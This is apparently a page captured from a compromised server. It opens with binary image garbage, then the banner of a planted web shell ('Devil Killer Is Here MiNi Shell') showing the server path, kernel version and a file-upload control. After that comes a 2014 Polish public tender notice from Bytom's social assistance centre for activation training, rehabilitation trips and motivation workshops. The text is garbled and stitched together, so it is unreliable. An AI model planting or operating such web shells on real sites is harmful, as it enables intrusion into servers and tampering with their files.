JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140526/176500-N-2014.html

<p class="kh_header"><b>Bytom: Zorganizowanie i przeprowadzenie usług dla uczestników/uczestniczek projektu pn.:Systemowy Projekt Aktywizacji - SPA w Bytomiu z podziałem na trzy części</b><br>
<b>Numer ogłoszenia: 176500 - 2014; data zamieszczenia: 26.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie , ul. Strzelców Bytomskich 16, 41-902 Bytom, woj. śląskie, tel. 032 3886740, 032 3886700, faks 032 2818093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopr.bytom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka organizacyjna m.Bytomia działająca w formie jednostki budżetowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie usług dla uczestników/uczestniczek projektu pn.:Systemowy Projekt Aktywizacji - SPA w Bytomiu z podziałem na trzy części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem nin. zamówienia jest zorganizowanie i przeprowadzenie usług dla osób  nieaktywnych zawodowo i bezrobotnych, znajdujących się w wieku aktywności zawodowej, które korzystają ze świadczeń pomocy społecznej i podlegają wykluczeniu społecznemu lub są zagrożone wykluczeniem oraz dla usamodzielnianych osób w wieku 17 - 25 lat, które opuszczają pieczę zastępczą. Przedmiot zamówienia realizowany jest w ramach projektu pod nazwą: Systemowy Projekt Aktywizacji - SPA w Bytomiu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2.Przedmiot zamówienia realizowany będzie z podziałem na następujące części: 
część A: Wyjazdowy trening umiejętności społeczno-zawodowych wraz z usługą doradcy zawodowego - szczegółowy opis przedmiotu zamówienia zawiera załącznik A do Specyfikacji; część B: Wyjazdowe zajęcia rehabilitacyjne z warsztatami niezależnego funkcjonowania z niepełnosprawnością - szczegółowy opis przedmiotu zamówienia zawiera załącznik B do Specyfikacji;część C: Trening motywacji do zmiany (moduł I oraz moduł II) - szczegółowy opis przedmiotu zamówienia zawiera załącznik  C do Specyfikacji.3.Ogólne zasady i sposób realizacji zamówienia określają Istotne postanowienia umowne stanowiące - załącznik nr 6 do specyfikacji.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca jest zobowiązany wykazać, że w okresie  ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną usługę polegającą na zorganizowaniu zajęć:w przypadku części A: z zakresu podnoszenia kompetencji/umiejętności społecznych/ społeczno-zawodowych, przeprowadzonych dla młodzieży opuszczających placówki opiekuńczo - wychowawcze lub pieczę zastępczą zrealizowaną na kwotę co najmniej 18.000,00 zł brutto wraz z załączeniem dowodu, wskazującego, że usługa została wykonana należycie; w przypadku części B: w formie grupowego wyjazdu przeprowadzonego dla minimum dziesięcioosobowej grupy osób niepełnosprawnych z zakresu zajęć rehabilitacyjnych zrealizowaną na kwotę co najmniej 20.000,00 zł brutto wraz z załączeniem dowodu, wskazującego, że usługa została wykonana należycie; w przypadku części C: z podnoszenia kompetencji/umiejętności społecznych, przeprowadzonych dla osób wykluczonych społecznie i zagrożonych marginalizacją  zrealizowaną na kwotę co najmniej 26.000,00 zł brutto wraz z załączeniem dowodu, wskazującego, że usługa została wykonana należycie. 2.Wykonawca może polegać w zakresie spełnienia warunków udziału w niniejszym postępowaniu na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków - w zakresie określonym art. 26 ust. 2b ustawy. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokument zobowiązania powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. UWAGA:
W przypadku gdy Wykonawca w zakresie potwierdzenia spełniania warunków udziału w postępowaniu powoła się na potencjał podwykonawcy, a w trakcie realizacji przedmiotu zamówienia dokona zmiany podwykonawcy lub zrezygnuje z podwykonawcy, zobowiązany będzie wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż określonym w ust.1. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana na podstawie dostarczonych wraz z ofertą oświadczeń i dokumentów wg formuły: spełnia - nie spełnia. Przedłożone dokumenty muszą zawierać potwierdzenie każdego elementu określonego w warunku. 4.Wykonawca zostanie wykluczony z postępowania, jeżeli zachodzić będą przesłanki określone w art. 24 ust. 1 i ust. 2 ustawy Prawo zamówień publicznych.
5.Oferta Wykonawcy zostanie odrzucona, jeżeli zachodzić będą przesłanki określone w art. 89 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Pod pojęciem głównych usług Zamawiający rozumie usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia opisanego powyższej.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) formularz oferty;2) szczegółowa wycena zamówienia dla danej części zamówienia stanowiąca odpowiednio: załącznik nr 1A i/lub 1B i/lub1C do specyfikacji;3) oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 3 do specyfikacji); oraz - jeżeli dotyczy:4) dokument stwierdzający ustanowienie pełnomocnika zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, w przypadku gdy o udzielenie niniejszego zamówienia Wykonawcy ubiegają się wspólnie - pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza;
5) pełnomocnictwo do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy wskazano inną osobę niż upoważnioną z mocy prawa - oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza lub inny dokument, z którego wynika upoważnienie do reprezentowania Wykonawcy oryginał lub kopia potwierdzona za zgodność z oryginałem przez Wykonawcę; 6)	dowód/dowody wskazujący/-ce, iż zasoby podmiotu trzeciego, na które powołuje się Wykonawca zostaną mu udostępnione do realizacji zamówienia, np. pisemne zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, z którego/-ych w szczególności wynika, co następuje:a)kto jest podmiotem przyjmującym zasoby,b)jaki jest zakres zobowiązania podmiotu trzeciego,c)czego konkretnie dotyczy zobowiązanie,d)w jaki sposób będzie wykonywane zobowiązanie,
e) jakiego zakresu dotyczy zobowiązanie. W sytuacji, gdy przedmiotem zobowiązania są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie przedmiotu zamówienia (np. doświadczenie) konieczne jest wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu przedmiotu zamówienia.Dokument/dokumenty dotyczące zobowiązania podmiotu trzeciego należy złożyć w oryginale (do tego celu można wykorzystać załącznik nr 7 do specyfikacji).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień niniejszej umowy w stosunku do treści oferty, za wyjątkiem niżej wymienionych możliwości i warunków dokonania takiej zmiany:1)Zamawiający przewiduje możliwość zmiany strony umowy, tj. w sytuacji wystąpienia następstwa prawnego wynikającego z odrębnych przepisów;2)Zamawiający przewiduje możliwość zmiany wynagrodzenia brutto, w tym cen jednostkowych brutto, w przypadku zmiany obowiązujących przepisów dotyczących podatku VAT;3) konieczność wprowadzenia zmian do umowy będzie następstwem zmian wytycznych dotyczących POKL lub wytycznych i zaleceń Instytucji Zarządzającej i/lub Instytucji Pośredniczącej I i II stopnia, nie mających wpływu na cenę przedmiotu umowy;4)Zamawiający przewiduje możliwość dokonania zmiany podwykonawcy i/lub części wykonywanego przez niego zakresu przedmiotu umowy, bądź wprowadzenie nowego podwykonawcy, bądź zrezygnowania z podwykonawcy. W przypadku zmiany lub rezygnacji z podwykonawcy, na którego potencjał Wykonawca powoływał się w zakresie spełnienia warunków udziału w postępowaniu o udzielenie zamówienia publicznego, Wykonawca zobowiązany jest wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia te warunki w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. Dokumenty potwierdzające spełnienie warunków udziału w postępowaniu, Wykonawca zobowiązany jest złożyć wraz z wnioskiem, 
o którym mowa w ust. 2;5)Zamawiający nie przewiduje możliwości zmiany terminu wykonania zamówienia jeżeli 
ze względu na przedłużającą się procedurę przetargową terminy wskazane w § 2 umowy nie będą mogły być zachowane. 6)Zamawiający przewiduje możliwość zmiany miejsca realizacji przedmiotu zamówienia z przyczyn zależnych od Wykonawcy, pod warunkiem zachowania standardu zgodnego z wymogami specyfikacji.2.Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego. Jakiekolwiek zmiany niniejszej umowy wymagają - pod rygorem nieważności - zachowania formy pisemnej w formie aneksu, za wyjątkiem sytuacji opisanej w ust. 1 pkt 6, wynikającej z zagrożenia żywiołem, dla ważności zmian, strony dokonają niezwłocznego ich potwierdzenia na piśmie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Bytomiu,ul. Strzelców Bytomskich 16
41-902 Bytom, Dział Administracyjny, II piętro, pokój nr 131.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2014 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Bytomiu,ul. Strzelców Bytomskich 16
41-902 Bytom, Dział Administracyjny, II piętro, pokój nr 131.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Przedmiot zamówienia realizowany jest w ramach PO KL projektu pod nazwą: Systemowy Projekt Aktywizacji - SPA w Bytomiu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2. Zamawiający nie zamierza zawrzeć umowy ramowej oraz nie zamierza ustanowić dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> część A: Wyjazdowy trening umiejętności społeczno - zawodowych wraz z usługą doradcy zawodowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uczestnikami/uczestniczkami są usamodzielniane osoby w wieku 17 - 25 lat, będące wychowankami placówek opiekuńczo wychowawczych lub rodzin zastępczych.Liczba uczestników/uczestniczek: maksymalnie 18 osób - uczestników/uczestniczek projektu. UWAGA:1.Wskazana liczba uczestników/uczestniczek może ulec zmniejszeniu z przyczyn, których Zamawiający nie mógł przewidzieć.2.Zamawiający zapłaci za faktyczną liczbę osób uczestniczących w treningu.3.Zajęcia winny odbywać się w dwóch grupach liczących po około 9 osób.4.Z uwagi na udział w treningu młodzieży szkolnej - Wykonawca zobowiązany jest zgłosić i przeprowadzić wyjazdowy trening zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 21 stycznia 1997 r. w sprawie warunków, jakie muszą spełniać organizatorzy wypoczynku dla dzieci i młodzieży szkolnej, a także zasad jego organizowania i nadzorowania (Dz. U. z 1997 r. nr 12, poz. 67 z późn. zm.). Czas trwania: zgodnie z zatwierdzonym harmonogramem przez 7 dni (wyjazd w pierwszym dniu w godzinach porannych, powrót w ostatnim dniu w godzinach wieczornych), zaplanowany w okresie od dnia 30 czerwca 2014 r. do 13 lipca 2014 r. Liczba godzin zajęć:1)32 godziny dla każdej grupy w zakresie treningu umiejętności społeczno-zawodowych (w formie zajęć/warsztatów interaktywnych/pogadanek);2)36 godzin konsultacji indywidualnych z zakresu doradztwa zawodowego, tj. po 2 godziny przypadające na każdego uczestnika/uczestniczkę. (przez godzinę Zamawiający rozumie godzinę lekcyjną trwającą 45 min.) Pozostałe informacje dotyczące opisu  przedmiotu zamówienia zawiera w załącznik A do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.07.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> część B: Wyjazdowe zajęcia rehabilitacyjne z warsztatami niezależnego funkcjonowania z niepełnosprawnością.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uczestniczkami i uczestnikami są osoby niepełnosprawne w wieku aktywności zawodowej, które korzystają ze świadczeń pomocy społecznej, podlegające wykluczeniu społecznemu lub zagrożone wykluczeniem. Liczba uczestników/uczestniczek: maksymalnie 20 osób dorosłych -uczestników/uczestniczek projektu.Liczba dzieci wymagających opieki:  maksymalnie 15 dzieci pozostających pod opieką rodzica/ów.UWAGA: 
1.Wskazana liczba uczestników/uczestniczek i dzieci może ulec zmniejszeniu z przyczyn, których Zamawiający nie mógł przewidzieć.2.Zamawiający zapłaci za faktyczną liczbę osób uczestniczących w zajęciach/warsztatach oraz faktyczną liczbę dzieci objętych opieką.3.W grupie uczestników/uczestniczek skierowanych na zajęcia występują następujące grupy schorzeń lub dysfunkcji: choroby narządu ruchu (z wyłączeniem osób poruszających się na wózkach), choroby układu krążenia, układu oddechowego i układu pokarmowego, choroby okulistyczne, psychiczne, neurologiczne, epilepsja, upośledzenie umysłowe, cukrzyca. Czas trwania: zgodnie z zatwierdzonym harmonogramem przez 7 dni (wyjazd w poniedziałek  w godzinach porannych, powrót w niedzielę w godzinach wieczornych), w terminie od 18 sierpnia 2014 r. do 24 sierpnia 2014 r.Liczba zabiegów rehabilitacyjnych: maksymalnie 300 zabiegów, tj. po 15 zabiegów przypadających na każdego uczestnika/uczestniczkę. Wykonawca zapewni podczas pobytu maksymalnie po 3 różne zabiegi rehabilitacyjne w ciągu jednego dnia dla każdego uczestnika/uczestniczki. Zabiegi muszą być wykonywane przez rehabilitantów/fizykoterapeutów posiadających odpowiednie kwalifikacje. UWAGA: Na początku pobytu Wykonawca zapewni przeprowadzenie badania lekarskiego, w trakcie którego zostaną ustalone zabiegi rehabilitacyjne, z których będzie korzystał każdy uczestnik/uczestniczka. Zajęcia rehabilitacyjne rozpoczną się w następnym dniu po zakwaterowaniu i będą kontynuowane do przedostatniego dnia pobytu.
Liczba godzin warsztatów: 10 godzin w formie warsztatów interaktywnych i pogadanek. (przez godzinę Zamawiający rozumie godzinę lekcyjną trwającą 45 min.). Pozostałe informacje dotyczące opisu przedmiotu zamówienia zawiera załącznik B do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> część C:Trening motywacji do zmiany (moduł I oraz moduł II).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uczestniczkami i uczestnikami są osoby w wieku aktywności zawodowej, które korzystają ze świadczeń pomocy społecznej, bezrobotne, podlegające wykluczeniu społecznemu lub zagrożone wykluczeniem. Moduł I - wyjazdowy
Liczba uczestników/uczestniczek: maksymalnie 26 osób dorosłych -uczestników/uczestniczek Programu Aktywności Lokalnej w ramach projektu.
Liczba dzieci wymagających opieki:  maksymalnie 25 dzieci pozostających pod opieką rodzica/ów. UWAGA: 1.Wskazana liczba uczestników/uczestniczek i dzieci może ulec zmniejszeniu z przyczyn, których Zamawiający nie mógł przewidzieć.2.Zamawiający zapłaci za faktyczną liczbę osób uczestniczących w treningu oraz faktyczną liczbę dzieci objętych opieką. 3.Zajęcia winny odbywać się w dwóch grupach liczących po około 15 osób. Czas trwania: zgodnie z zatwierdzonym harmonogramem przez 5 dni (wyjazd w pierwszym dniu w godzinach porannych, powrót w ostatnim dniu w godzinach wieczornych), zaplanowany w terminie od 01 lipca 2014 r. do 31 lipca 2014 r.UWAGA: 
Z uwagi na to, iż osoby kierowane na wyjazd uczestniczą również w innych zajęciach w ramach projektu - Wykonawca musi zaplanować termin wyjazdu w taki sposób, aby nie obejmował dni: 17, 18 oraz 19 lipca 2014 r.Liczba godzin treningu: 24 godziny w formie zajęć/warsztatów interaktywnych i pogadanek. 
